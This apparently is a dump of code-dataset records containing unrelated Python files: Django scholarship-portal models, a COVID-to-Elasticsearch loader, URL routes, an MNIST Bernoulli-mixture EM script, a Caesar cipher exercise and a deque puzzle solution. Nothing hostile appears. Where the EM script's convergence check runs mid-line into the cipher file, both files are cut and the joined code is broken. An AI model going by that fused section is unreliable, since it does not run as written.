(\"Rajasthan\", \"Rajasthan\"),\n (\"Sikkim\", \"Sikkim\"),\n (\"Tamil Nadu\", \"Tamil Nadu\"),\n (\"Telangana\", \"Telangana\"),\n (\"Tripura\", \"Tripura\"),\n (\"Uttarakhand\", \"Uttarakhand\"),\n (\"Uttar Pradesh\", \"Uttar Pradesh\"),\n (\"West Bengal\", \"West Bengal\"),\n (\"Andaman and Nicobar Islands\", \"Andaman and Nicobar Islands\"),\n (\"Chandigarh\", \"Chandigarh\"),\n (\n \"Dadra and Nagar Haveli and Daman & Diu\",\n \"Dadra and Nagar Haveli and Daman & Diu\",\n ),\n (\"The Government of NCT of Delhi\", \"The Government of NCT of Delhi\"),\n (\"Jammu & Kashmir\", \"Jammu & Kashmir\"),\n (\"Ladakh\", \"Ladakh\"),\n (\"Lakshadweep\", \"Lakshadweep\"),\n (\"Puducherry\", \"Puducherry\"),\n)\n\n\nclass Constraint(models.Model):\n name = models.CharField(max_length=1024)\n description = models.TextField(blank=True, null=True)\n required = models.BooleanField(default=True)\n\n def __str__(self):\n return self.name\n\n\nclass ScholarshipCategory(models.Model):\n name = models.CharField(max_length=1024)\n\n def __str__(self):\n return self.name\n\n class Meta:\n verbose_name_plural = \"Scholarship Categories\"\n\n\nclass Scholarship(models.Model):\n class ScholarshipType(models.IntegerChoices):\n # NOTE: don't change the integer values\n MCM_TIET = 1\n MCM_ALUMNI = 2\n MCM_OTHER = 3\n MERIT_ALUMNI = 4\n MERIT_AUTO = 5\n\n name = models.CharField(max_length=200)\n category = models.ForeignKey(ScholarshipCategory, on_delete=models.CASCADE)\n scholarship_type = models.IntegerField(choices=ScholarshipType.choices)\n\n eligibility_criteria = models.TextField()\n number_of_scholarships = models.CharField(max_length=1024)\n value_of_scholarship = models.TextField()\n\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n\n constraints = models.ManyToManyField(Constraint, through=\"ScholarshipConstraint\")\n\n def __str__(self):\n return self.name\n\n @property\n def verbose_type(self):\n if self.scholarship_type == 1:\n return \"MCM_TIET\"\n elif self.scholarship_type == 2:\n return \"MCM_ALUMNI\"\n elif self.scholarship_type == 3:\n return \"MCM_OTHER\"\n elif self.scholarship_type == 4:\n return \"MERIT_ALUMNI\"\n else:\n return \"MERIT_AUTO\"\n\n\nclass ScholarshipConstraint(models.Model):\n scholarship = models.ForeignKey(Scholarship, on_delete=models.CASCADE)\n constraint = models.ForeignKey(Constraint, on_delete=models.CASCADE)\n min_value = models.FloatField(blank=True, null=True)\n max_value = models.FloatField(blank=True, null=True)\n\n def __str__(self):\n return f\"{self.constraint.name} constraint on [{self.scholarship.name}]\"\n\n\nclass MCMTietApplication(models.Model):\n \"\"\"Scholarship Type: MCM_TIET = 1\"\"\"\n\n student = models.ForeignKey(Student, on_delete=models.CASCADE)\n scholarship = models.ForeignKey(Scholarship, on_delete=models.CASCADE)\n contact_number = models.PositiveIntegerField()\n alternate_contact_number = models.PositiveIntegerField()\n state_of_residence = models.CharField(choices=STATE_CHOICES, max_length=255)\n\n class_12_marks = models.CharField(\n max_length=255, help_text=\"Enter percentage e.g. 89.8 \"\n ) # % or CGPA\n current_cgpa_or_rank = models.CharField(\n max_length=255, help_text=\"Current CGPA or Rank or Diploma %\"\n )\n\n family_income_per_mcm_application = models.CharField(\n max_length=255, help_text=\"FAMILY INCOME AS MENTIONED IN MCM APPLICATION FORM\"\n )\n family_income_per_affidavit = models.CharField(\n max_length=255, help_text=\"FAMILY INCOME AS PER AFFIDAVIT ATTACHED\"\n )\n family_income_per_certificate = models.CharField(\n max_length=255, help_text=\"FAMILY INCOME AS PER CERTIFICATE OF TEHSILDAR\"\n )\n bank_balance = models.IntegerField()\n fdr_balance = models.CharField(max_length=255, help_text=\"\")\n\n itr_annual_year_current = models.IntegerField(help_text=\"ITR for this annual year\")\n itr_annual_year_last = models.IntegerField(help_text=\"ITR for previous annual year\")\n itr_annual_year_last_last = models.IntegerField(\n help_text=\"ITR for last to last annual year\"\n )\n\n immovable_property = models.BooleanField(\n help_text=\"IMMOVABLE PROPERTY AS PER AFFIDAVIT\"\n )\n single_girl_child = models.BooleanField(help_text=\"Are you a Single Girl Child?\")\n\n applied_for_mcp_special = models.BooleanField(help_text=\"APPLIED FOR MCM SPECIAL?\")\n mcp_special_reason = models.TextField(\n help_text=\"SPECIFIC REASON FOR APPLYING MCM SPECIAL?\", blank=True, null=True\n )\n\n applied_for_other_scholarship = models.BooleanField(\n help_text=\"HAVE YOU APPLIED FOR ANY OTHER SCHOLARSHIP?\"\n )\n other_scholarship_details = models.TextField(\n help_text=\"DETAILS OF OTHER SCHOLARSHIP APPLIED\", blank=True, null=True\n )\n\n previous_year_scholarship = models.BooleanField(\n help_text=\"HAVE YOU RECEIVED ANY SCHOLARSHIP IN THE PREVIOUS YEAR?\"\n )\n previous_year_scholarship_details = models.TextField(\n help_text=\"DETAILS OF PREVIOUS SCHOLARSHIP RECEIVED\", blank=True, null=True\n )\n previous_year_scholarship_amount = models.IntegerField(\n help_text=\"AMOUNT OF THE PREVIOUS SCHOLARSHIP\", blank=True, null=True\n )\n\n income_certificate = models.FileField(\n help_text=\"Please upload a digital / scanned copy of your income certificate\",\n upload_to=\"income_certificates\",\n validators=[\n FileExtensionValidator(allowed_extensions=[\"pdf\", \"jpg\", \"png\", \"jpeg\"])\n ],\n )\n supporting_documents = models.FileField(\n help_text=\"Please upload supporting documents in a .zip format, if any\",\n blank=True,\n null=True,\n upload_to=\"supporting_documents\",\n )\n\n declaration = models.BooleanField(\n help_text=\"I acknowledge that i have read all the eligibility criteria of scholarship and i am eligible for \"\n \"applying to TIET Merit-cum-means scholarship.\"\n )\n\n status = models.CharField(\n max_length=1024,\n default=\"PENDING\",\n choices=(\n (\"PENDING\", \"PENDING\"),\n (\"APPROVED\", \"APPROVED\"),\n (\"REJECTED\", \"REJECTED\"),\n ),\n )\n remarks = models.TextField(blank=True, null=True)\n\n # TODO: fill more fields, https://docs.google.com/forms/d/e/1FAIpQLScSaU3NGIu13V4j9fEi5B1Djl503c72o9sZ-9YsVY1_hsM4aA/viewform\n\n def __str__(self):\n return f\"Application for [{self.scholarship.name[:15]}...]\"\n\n class Meta:\n verbose_name_plural = \"Merit cum Means Applications\"\n verbose_name = \"Merit cum means Application\"\n\n\nclass MCMAlumniApplication(models.Model):\n \"\"\"Scholarship Type: MCM_ALUMNI = 2\"\"\"\n\n student = models.ForeignKey(Student, on_delete=models.CASCADE)\n scholarship = models.ForeignKey(Scholarship, on_delete=models.CASCADE)\n\n photograph = models.FileField(\n help_text=\"Passport size photograph in JPG/PNG under 2 MB.\",\n blank=True,\n null=True,\n upload_to=\"photographs\",\n )\n\n roll_no = models.CharField(max_length=20, help_text=\"Registration/Roll No\")\n personal_contact_number = models.PositiveIntegerField()\n year = models.CharField(max_length=20, help_text=\"Year\")\n branch = models.CharField(max_length=20, help_text=\"Branch\")\n\n jee_main_rank = models.CharField(max_length=255, help_text=\"JEE Main Rank\")\n current_cgpa = models.CharField(max_length=255, help_text=\"Current CGPA\")\n\n father_name = models.CharField(max_length=255, help_text=\"Father's Name\")\n father_profession = models.CharField(\n max_length=255, help_text=\"Father's Profession\"\n )\n father_contact_number = models.PositiveIntegerField(\n help_text=\"Father's Contact Number\"\n )\n\n mother_name = models.CharField(max_length=255, help_text=\"Mother's Name\")\n mother_profession = models.CharField(\n max_length=255, help_text=\"Mother's Profession\"\n )\n\n mother_contact_number = models.PositiveIntegerField(\n help_text=\"Mother's Contact Number\"\n )\n\n family_income_per_annum = models.CharField(\n max_length=255, help_text=\"Family income per annum\"\n )\n\n bank_name = models.CharField(max_length=255, help_text=\"Student's Bank Name\")\n bank_account_number = models.CharField(\n max_length=255, help_text=\"Bank Savings Account Number\"\n )\n banK_address = models.CharField(max_length=255, help_text=\"Bank Branch Address\")\n bank_ifsc_code = models.CharField(max_length=255, help_text=\"Bank IFSC Code\")\n\n declaration = models.BooleanField(\n help_text=\"I acknowledge that I have read all the eligibility criteria of this scholarship and I am eligible \"\n \"for applying to this scholarship.\"\n )\n\n status = models.CharField(\n max_length=1024,\n default=\"PENDING\",\n choices=(\n (\"PENDING\", \"PENDING\"),\n (\"APPROVED\", \"APPROVED\"),\n (\"REJECTED\", \"REJECTED\"),\n ),\n )\n remarks = models.TextField(blank=True, null=True)\n\n def __str__(self):\n return f\"Application for [{self.scholarship.name[:15]}...]\"\n\n class Meta:\n verbose_name_plural = \"Merit cum Means Alumni Applications\"\n verbose_name = \"Merit cum Means Alumni Application\"\n\n\nclass MCMOtherApplication(models.Model):\n \"\"\"Scholarship Type: MCM_OTHER = 3\"\"\"\n\n student = models.ForeignKey(Student, on_delete=models.CASCADE)\n scholarship = models.ForeignKey(Scholarship, on_delete=models.CASCADE)\n\n photograph = models.FileField(\n help_text=\"Passport size photograph in JPG/PNG under 2 MB.\",\n blank=True,\n null=True,\n upload_to=\"photographs\",\n )\n\n roll_no = models.CharField(max_length=20, help_text=\"Registration/Roll No\")\n personal_contact_number = models.PositiveIntegerField()\n year = models.CharField(max_length=20, help_text=\"Year\")\n branch = models.CharField(max_length=20, help_text=\"Branch\")\n\n jee_main_rank = models.CharField(max_length=255, help_text=\"JEE Main Rank\")\n current_cgpa = models.CharField(max_length=255, help_text=\"Current CGPA\")\n\n father_name = models.CharField(max_length=255, help_text=\"Father's Name\")\n father_profession = models.CharField(\n max_length=255, help_text=\"Father's Profession\"\n )\n father_contact_number = models.PositiveIntegerField(\n help_text=\"Father's Contact Number\"\n )\n\n mother_name = models.CharField(max_length=255, help_text=\"Mother's Name\")\n mother_profession = models.CharField(\n max_length=255, help_text=\"Mother's Profession\"\n )\n\n mother_contact_number = models.PositiveIntegerField(\n help_text=\"Mother's Contact Number\"\n )\n\n family_income_per_annum = models.CharField(\n max_length=255, help_text=\"Family income per annum\"\n )\n\n bank_name = models.CharField(max_length=255, help_text=\"Student's Bank Name\")\n bank_account_number = models.CharField(\n max_length=255, help_text=\"Bank Savings Account Number\"\n )\n banK_address = models.CharField(max_length=255, help_text=\"Bank Branch Address\")\n bank_ifsc_code = models.CharField(max_length=255, help_text=\"Bank IFSC Code\")\n\n declaration = models.BooleanField(\n help_text=\"I acknowledge that I have read all the eligibility criteria of this scholarship and I am eligible \"\n \"for applying to this scholarship.\"\n )\n\n status = models.CharField(\n max_length=1024,\n default=\"PENDING\",\n choices=(\n (\"PENDING\", \"PENDING\"),\n (\"APPROVED\", \"APPROVED\"),\n (\"REJECTED\", \"REJECTED\"),\n ),\n )\n remarks = models.TextField(blank=True, null=True)\n\n def __str__(self):\n return f\"Application for [{self.scholarship.name[:15]}...]\"\n\n class Meta:\n verbose_name_plural = \"Merit cum Means Other Applications\"\n verbose_name = \"Merit cum Means Other Application\"\n\n\nclass NoticeCategory(models.Model):\n id = models.UUIDField(default=uuid4, primary_key=True, unique=True, editable=False)\n title = models.TextField()\n collapsed = models.BooleanField(default=True)\n\n def __str__(self):\n return self.title\n\n class Meta:\n verbose_name_plural = \"Notice Categories\"\n\n\nclass Notice(models.Model):\n id = models.UUIDField(default=uuid4, primary_key=True, unique=True, editable=False)\n category = models.ForeignKey(\n NoticeCategory, on_delete=models.CASCADE, blank=True, null=True\n )\n title = models.TextField()\n attachment = models.FileField(blank=True, null=True, upload_to=\"notice_attachments\")\n link = models.CharField(max_length=1024, blank=True, null=True)\n date = models.DateTimeField(auto_now_add=True, editable=False)\n\n def __str__(self):\n return self.title\n\n\nclass Grievance(models.Model):\n student = models.ForeignKey(Student, on_delete=models.CASCADE)\n subject = models.TextField()\n issue_details = models.TextField()\n date_opened = models.DateTimeField(auto_now_add=True)\n\n resolved = models.BooleanField(default=False)\n remarks = models.TextField(blank=True, null=True)\n\n def __str__(self):\n return self.subject\n\n\nclass ReceivedScholarship(models.Model):\n student = models.ForeignKey(Student, on_delete=models.CASCADE)\n scholarship = models.ForeignKey(Scholarship, on_delete=models.CASCADE)\n session = models.ForeignKey(Session, on_delete=models.CASCADE)\n\n year_of_study = models.CharField(max_length=1024, blank=True, null=True)\n branch = models.CharField(max_length=1024, default=\"UNSPECIFIED\")\n programme = models.CharField(blank=True, null=True, max_length=1024)\n\n current_cgpa = models.FloatField(blank=True, null=True)\n cgpa_1st_semester = models.FloatField(blank=True, null=True)\n cgpa_2nd_semester = models.FloatField(blank=True, null=True)\n cgpa_3rd_semester = models.FloatField(blank=True, null=True)\n sgpa_5th_semester = models.FloatField(blank=True, null=True)\n sgpa_6th_semester = models.FloatField(blank=True, null=True)\n agpa = models.FloatField(blank=True, null=True)\n marks = models.FloatField(blank=True, null=True)\n jee_rank = models.FloatField(blank=True, null=True)\n pcme_percentage = models.FloatField(blank=True, null=True)\n pcb_percentage = models.FloatField(blank=True, null=True)\n ti_rank = models.FloatField(blank=True, null=True)\n tu_rank = models.FloatField(blank=True, null=True)\n twelfth_overall_percentage = models.FloatField(blank=True, null=True)\n\n amount = models.PositiveIntegerField()\n\n def __str__(self):\n return self.scholarship.name + f\" [{self.session.name}]\"\n\n\nclass CertificateRequest(models.Model):\n received_scholarship = models.OneToOneField(ReceivedScholarship, on_delete=models.CASCADE)\n student = models.ForeignKey(Student, on_delete=models.CASCADE)\n date_requested = models.DateTimeField(auto_now=True, editable=False)\n approved = models.BooleanField(default=False)\n date_approved = models.DateTimeField(blank=False, null=True)\n year_of_passing = models.CharField(max_length=1024, blank=False, null=True)\n passing_cgpa = models.CharField(max_length=1024, blank=False, null=True)\n certificate = models.FileField(blank=True, null=True)\n\n def __str__(self):\n return self.received_scholarship.scholarship.name + \": \" + self.received_scholarship.session.name\n\n def save(self, *args, **kwargs):\n if self.approved:\n rendered_certificate = render_to_string(\"pdfs/scholarship_certificate.html\", {\n 'date': self.date_approved.date(),\n 'image_path': finders.find('signature.png'),\n 'ref_no': self.id,\n 'name': self.student.student_name or self.student.user.get_full_name(),\n 'roll_no': self.student.roll_no,\n 'father_name': self.student.father_name,\n 'programme_name': self.student.program_name,\n 'branch': self.student.branch_desc,\n 'passing': self.year_of_passing,\n 'cgpa': self.passing_cgpa,\n 'scholarship': self.received_scholarship.scholarship.name,\n 'amount': self.received_scholarship.amount,\n 'session': self.received_scholarship.session.name\n })\n\n options = {\n 'page-size': 'Letter',\n 'margin-top': '0.75in',\n 'margin-right': '0.75in',\n 'margin-bottom': '0.75in',\n 'margin-left': '0.75in',\n 'encoding': \"UTF-8\",\n 'custom-header': [\n ('Accept-Encoding', 'gzip')\n ],\n 'no-outline': None\n }\n certificate_name = f\"scholarship_certificate_{uuid4()}.pdf\"\n pdfkit.from_string(rendered_certificate,\n settings.MEDIA_ROOT / certificate_name,\n options=options)\n self.certificate.name = certificate_name\n\n super(CertificateRequest, self).save(*args, **kwargs)\n\n\nclass ExcelError:\n\n def __init__(self, row_id, error_msg):\n self.row_id = row_id\n self.error_msg = error_msg\n","repo_name":"MagnumDingusEdu/capstone","sub_path":"website/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":18324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"71844702829","text":"from datetime import datetime\nimport csv\nimport requests\nfrom elasticsearch import Elasticsearch\n\n\ndef formatCCAA(ccaa):\n if ccaa == \"C. Valenciana\":\n ccaa = \"Comunidad Valenciana\"\n elif ccaa == \"Madrid\":\n ccaa = \"Comunidad de Madrid\"\n elif ccaa == \"Murcia\":\n ccaa = \"Región de Murcia\"\n elif ccaa == \"Baleares\":\n ccaa = \"Islas Baleares\"\n\n return ccaa\n\n\n# Spain urls\nurl_altas_spain = \"https://raw.githubusercontent.com/datadista/datasets/master/COVID%2019/ccaa_covid19_altas.csv\"\nurl_casos_spain = \"https://raw.githubusercontent.com/datadista/datasets/master/COVID%2019/ccaa_covid19_casos.csv\"\nurl_fallecidos_spain = \"https://raw.githubusercontent.com/datadista/datasets/master/COVID%2019/ccaa_covid19_fallecidos.csv\"\nurl_uci_spain = \"https://raw.githubusercontent.com/datadista/datasets/master/COVID%2019/ccaa_covid19_uci.csv\"\n\n\n# CCAA\nurl_ccaa_cyl = \"https://datosabiertos.jcyl.es/web/jcyl/risp/es/sector-publico/situacion-epidemiologica-coronavirus/1284940407131.csv\"\n\n\ndef save_elasticsearch_es(index, result_data):\n\n es = Elasticsearch()\n\n es.indices.create(\n index=index,\n ignore=400 # ignore 400 already exists code\n )\n print(result_data)\n\n id_case = str(result_data['date'].timestamp()) + \\\n '-'+result_data['CCAA']+'-'+result_data['type']\n es.index(index=index, id=id_case, body=result_data)\n\n\ndef get_data_csv_spain(base_url, index, case_type):\n '''\n :param base_url:\n :param index:\n :param type:\n\n '''\n\n with requests.get(base_url, stream=True) as r:\n lines = (line.decode('utf-8') for line in r.iter_lines())\n datasheets = list(csv.reader(lines))\n\n # Removing last lien with the Total\n del datasheets[-1]\n\n dateframe = datasheets[0][2:]\n for row in datasheets[1:]:\n ccaa = formatCCAA(row[1])\n\n result_data = {\n 'CCAA': ccaa,\n 'country': 'Spain',\n }\n\n previousData = 0\n infection_day_100 = 0\n\n for day, data in zip(dateframe, row[2:]):\n dataAux = int(data)\n data = int(data) - previousData\n previousData = dataAux\n\n if dataAux >= 100:\n infection_day_100 += 1\n\n result_data.update(\n date=datetime.strptime(day, \"%Y-%m-%d\"),\n type=case_type,\n count_case=int(data),\n total_case=dataAux,\n rate_100_infection=infection_day_100\n )\n save_elasticsearch_es(index, result_data)\n\n\nif __name__ == '__main__':\n\n # COVID Spain\n index_name = 'covid_spain'\n get_data_csv_spain(url_altas_spain, index_name, 'recuperado')\n get_data_csv_spain(url_casos_spain, index_name, 'confirmado')\n get_data_csv_spain(url_fallecidos_spain, index_name, 'fallecido')\n get_data_csv_spain(url_uci_spain, index_name, 'uci')\n","repo_name":"david-morenomoreno/COVID19","sub_path":"covidSpain.py","file_name":"covidSpain.py","file_ext":"py","file_size_in_byte":2988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"1103000429","text":"\"\"\"app URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom drf_spectacular.views import (\n SpectacularAPIView,\n SpectacularSwaggerView,\n)\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom rest_framework_simplejwt.views import (\n TokenObtainPairView,\n TokenRefreshView,\n TokenVerifyView,\n)\n\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('api/schema/', SpectacularAPIView.as_view(), name='api-schema'),\n path('api/docs/',\n SpectacularSwaggerView.as_view(url_name='api-schema'),\n name='api-docs'),\n path('api/user/', include('user.urls')),\n path('api/forest/', include('forest.urls')),\n path('api/species/', include('species.urls')),\n path('api/reference/', include('reference.urls')),\n path('api/register/', include('register.urls')),\n path('api/register_picture/', include('register_picture.urls')),\n path('api/login/',\n TokenObtainPairView.as_view(),\n name='token_obtain_pair'),\n path('api/login/refresh/',\n TokenRefreshView.as_view(),\n name='token_refresh'),\n path('api/login/verify/',\n TokenVerifyView.as_view(),\n name='token_verify'),\n]\n","repo_name":"taniagmangolini/suceco-api","sub_path":"app/app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1765,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"34030774035","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n\nfrom sklearn.datasets import fetch_openml\n\nmnist = fetch_openml(\"mnist_784\")\nmnist.data.shape\n'''\nMNIST data is in grey scale [0, 255].\nConvert it to a binary scale using a threshold of 128.\n'''\nmnist3 = (mnist.data/128).astype('int')\ndef pixel_convert(x):\n count = 0\n while x > 8 :\n count+=1\n x=x-8\n return count\n\ndef load_image_data(image_file):\n image = []\n image_for_discrete = []\n magic_number = image_file.read(4)\n magic_number = int.from_bytes(magic_number, byteorder='big') # byteorder='big':輸入左邊bit為高位,右邊為低位\n images_number = image_file.read(4)\n images_number = int.from_bytes(images_number, byteorder='big') # byteorder='big':輸入左邊bit為高位,右邊為低位\n rows_number = image_file.read(4)\n rows_number = int.from_bytes(rows_number, byteorder='big') # byteorder='big':輸入左邊bit為高位,右邊為低位\n columns_number = image_file.read(4)\n columns_number = int.from_bytes(columns_number, byteorder='big') # byteorder='big':輸入左邊bit為高位,右邊為低位\n for i in range(images_number):\n temp_image = []\n temp_image_for_discrete = []\n for j in range(rows_number*columns_number):\n data = image_file.read(1)\n data = int.from_bytes(data, byteorder='big')\n data_for_discrete = convert_pixel(data)\n temp_image.append(data)\n temp_image_for_discrete.append(data_for_discrete)\n image.append(temp_image)\n image_for_discrete.append(temp_image_for_discrete)\n #print(image) \n return image ,image_for_discrete\n\ndef load_label_data(label_file):\n label = []\n magic_number = label_file.read(4)\n magic_number = int.from_bytes(magic_number, byteorder='big') # byteorder='big':輸入左邊bit為高位,右邊為低位\n items_number = label_file.read(4)\n items_number = int.from_bytes(items_number, byteorder='big') # byteorder='big':輸入左邊bit為高位,右邊為低位\n \n for i in range(items_number):\n data = label_file.read(1)\n data = int.from_bytes(data, byteorder='big')\n label.append(data)\n return label \n\n\ndef print_test_image(image_list,label_list):\n data=open(\"output_image.txt\",'w+')\n data.write(\"Imagination of numbers in Bayesian classifier:\\n\")\n for i in range(len(image_list)):\n data.write(str(label_list[i])+\":\\n\")\n for j in range(28):\n for k in range(28):\n if image_list[i][k+28*j]<8:\n data.write(\"0\")\n else:\n data.write(\"1\") \n data.write(\"\\n\")\n data.write(\"\\n\")\n data.write(\"\\n\")\n return 0\n\ndef convert_pixel(x):\n if x > 127:\n return 1\n else:\n return 0\ndef show(image):\n '''\n Function to plot the MNIST data\n '''\n fig = plt.figure()\n ax = fig.add_subplot(1,1,1)\n imgplot = ax.imshow(image, cmap=plt.cm.Greys)\n imgplot.set_interpolation('nearest')\n ax.xaxis.set_ticks_position('top')\n ax.yaxis.set_ticks_position('left')\n plt.show()\n\ndef bernoulli(data, means):\n '''To compute the probability of x for each bernouli distribution\n data = N X D matrix\n means = K X D matrix\n prob (result) = N X K matrix \n '''\n N = len(data)\n K = len(means)\n #compute prob(x/mean)\n # prob[i, k] for ith data point, and kth cluster/mixture distribution\n prob = np.zeros((N, K))\n \n for i in range(N):\n for k in range(K):\n prob[i,k] = np.prod((means[k]**data[i])*((1-means[k])**(1-data[i])))\n \n return prob\n\ndef respBernoulli(data, weights, means):\n '''To compute responsibilities, or posterior probability p(z/x)\n data = N X D matrix\n weights = K dimensional vector\n means = K X D matrix\n prob or resp (result) = N X K matrix \n '''\n #step 1\n # calculate the p(x/means)\n prob = bernoulli(data, means)\n \n #step 2\n # calculate the numerator of the resp.s\n prob = prob*weights\n \n #step 3\n # calcualte the denominator of the resp.s\n row_sums = prob.sum(axis=1)[:, np.newaxis]\n \n # step 4\n # calculate the resp.s\n try:\n prob = prob/row_sums\n return prob\n except ZeroDivisionError:\n print(\"Division by zero occured in reponsibility calculations!\")\n \n \n\ndef bernoulliMStep(data, resp):\n '''Re-estimate the parameters using the current responsibilities\n data = N X D matrix\n resp = N X K matrix\n return revised weights (K vector) and means (K X D matrix)\n '''\n N = len(data)\n D = len(data[0])\n K = len(resp[0])\n \n Nk = np.sum(resp, axis=0)\n mus = np.empty((K,D))\n \n for k in range(K):\n mus[k] = np.sum(resp[:,k][:,np.newaxis]*data,axis=0) #sum is over N data points\n try:\n mus[k] = mus[k]/Nk[k] \n except ZeroDivisionError:\n print(\"Division by zero occured in Mixture of Bernoulli Dist M-Step!\")\n break \n \n return (Nk/N, mus)\n\ndef llBernoulli(data, weights, means):\n '''To compute expectation of the loglikelihood of Mixture of Beroullie distributions\n Since computing E(LL) requires computing responsibilities, this function does a double-duty\n to return responsibilities too\n '''\n N = len(data)\n K = len(means)\n \n resp = respBernoulli(data, weights, means)\n \n ll = 0\n for i in range(N):\n sumK = 0\n for k in range(K):\n try:\n temp1 = ((means[k]**data[i])*((1-means[k])**(1-data[i])))\n temp1 = np.log(temp1.clip(min=1e-50))\n \n except:\n print(\"Problem computing log(probability)\")\n sumK += resp[i, k]*(np.log(weights[k])+np.sum(temp1))\n ll += sumK\n \n return (ll, resp)\n\ndef mixOfBernoulliEM(data, init_weights, init_means, maxiters=1000, relgap=1e-4, verbose=False):\n '''EM algo fo Mixture of Bernoulli Distributions'''\n N = len(data)\n D = len(data[0])\n K = len(init_means)\n \n #initalize\n weights = init_weights[:]\n means = init_means[:]\n ll, resp = llBernoulli(data, weights, means)\n ll_old = ll\n \n for i in range(maxiters):\n if verbose and (i % 5 ==0):\n print(\"iteration {}:\".format(i))\n print(\" {}:\".format(weights))\n print(\" {:.6}\".format(ll))\n \n #E Step: calculate resps\n #Skip, rolled into log likelihood calc\n #For 0th step, done as part of initialization\n \n #M Step\n weights, means = bernoulliMStep(data, resp)\n \n #convergence check\n ll, resp = llBernoulli(data, weights, means)\n if np.abs(ll-ll_old) ord(\"z\"):\n encrypted += chr(ord(letter) + step - len(string.ascii_lowercase)).upper()\n else:\n encrypted += chr(ord(letter) + step).upper()\n encrypted_words.append(encrypted)\n \n return \" \".join(encrypted_words)\n\n\n# decrypt a message using a Caesars cipher \ndef caesars_decrypt(to_decrypt = str, \n step = int):\n \n \"\"\"\n Decrypts a message that was originally encrypted using Caesars cipher\n The steps can again be inputted in the function\n \"\"\"\n \n word_list = list(to_decrypt.split(\" \"))\n decrypted_words = []\n \n for word in word_list:\n decrypted = \"\"\n for letter in word:\n if letter not in string.ascii_uppercase:\n continue\n letter = letter.lower()\n if (ord(letter) - step) < ord(\"a\"):\n decrypted += chr(ord(letter) - step + len(string.ascii_lowercase))\n else:\n decrypted += chr(ord(letter) - step)\n decrypted_words.append(decrypted)\n \n return \" \".join(decrypted_words)\n \n\ndef break_caesar(message = str, \n most_frequent = \"e\"):\n \n \"\"\"\n Attempts to decode an encode message based on frequency analysis\n This function relies on the hypothesis that the letter 'e' is the most\n commonly used letter in strings\n \"\"\"\n \n highest_proportion = -1\n frequent_letter = \"\"\n \n # get the most frequent letter\n for letter in set(message):\n if message.count(letter) > highest_proportion:\n highest_proportion = message.count(letter)\n frequent_letter = letter\n \n # assume that this letter represents an \"e\"\n step = ord(frequent_letter.lower()) - ord(\"e\")\n \n return caesars_decrypt(to_decrypt = message, \n step = step)\n \n\n#%%\n \n# the string we start from\ntext = \"lorem ipsum dolor sit amet consectetur adipiscing elit sed do eiusmod tempor incididunt ut labore et dolore magna aliqua semper viverra nam libero justo laoreet sit amet cursus nibh ipsum consequat nisl vel pretium lectus condimentum id venenatis a condimentum vitae sapien elit eget gravida cum sociis natoque penatibus et in hendrerit gravida rutrum quisque pulvinar etiam non quam lacus aliquam faucibus purus in massa tempor nec feugiat nisl pretium blandit volutpat maecenas volutpat blandit aliquam etiam erat velit scelerisque in dictum non consectetur a sagittis orci a scelerisque purus semper at urna condimentum mattis pellentesque id nibh vitae purus faucibus ornare suspendisse libero justo laoreet sit amet cursus sit\"\n\nprint(\"\\n- - - -\\nOriginal message\\n- - - -\\n\")\nprint(text)\n\n# an example of the encryption process\nencrypted = caesars_encrypt(to_encrypt = text,\n step = 3)\nprint(\"\\n- - - -\\nEncrypted message using Caesar's cipher\\n- - - -\\n\")\nprint(encrypted)\n\n# an example of the decryption process\ndecrypted = caesars_decrypt(to_decrypt = encrypted, \n step = 3)\nprint(\"\\n- - - -\\nDecrypted message using Caesar's cipher\\n- - - -\\n\")\nprint(decrypted)\n\n# show the code breaker\ndeciphered = break_caesar(message = encrypted.replace(\" \", \"\"))\nprint(\"\\n- - - -\\nDecrypted message using frequency analysis\\n- - - -\\n\")\nprint(deciphered)","repo_name":"shaista1519/Practice-of-computing-using-Python","sub_path":"Part 3/Chapter 07/Programming projects/project_04.py","file_name":"project_04.py","file_ext":"py","file_size_in_byte":4419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"207130899","text":"# https://www.acmicpc.net/problem/5430\n\nfrom collections import deque\nimport sys\n\ninput = sys.stdin.readline\n\nt = int(input())\n\nfor _ in range(t):\n p = input().strip()\n n = int(input())\n arr = input().strip()\n if len(arr) == 2: # 빈 배열이 들어왔을 때\n arr = []\n else:\n arr = arr[1:-1].split(',')\n deq = deque(arr)\n \n rvs = False\n err = False\n \n for cmd in p:\n if cmd == 'R': # 배열의 순서 뒤집기\n rvs = False if rvs else True\n elif cmd == 'D': # 첫 번째 수 버리기\n if not deq:\n err = True\n break\n if rvs:\n deq.pop()\n else:\n deq.popleft()\n \n if err:\n print(\"error\")\n continue\n if rvs:\n deq.reverse()\n print(\"[\" + \",\".join(deq) + \"]\")","repo_name":"zero0205/Algorithm_Python","sub_path":"solved_class3/5430_AC.py","file_name":"5430_AC.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"15731535153","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Sep 15 09:39:43 2017\n\n@author: mkeranen\n\nDiameter measurement work - need to optimize binarize, segment out main diameter\nCurrently finds largest contour in range and drops fits a circle in.\n\"\"\"\n\n# import the necessary packages\nfrom scipy.spatial import distance as dist\nfrom imutils import perspective\nfrom imutils import contours\nimport numpy as np\nimport argparse\nimport imutils\nimport 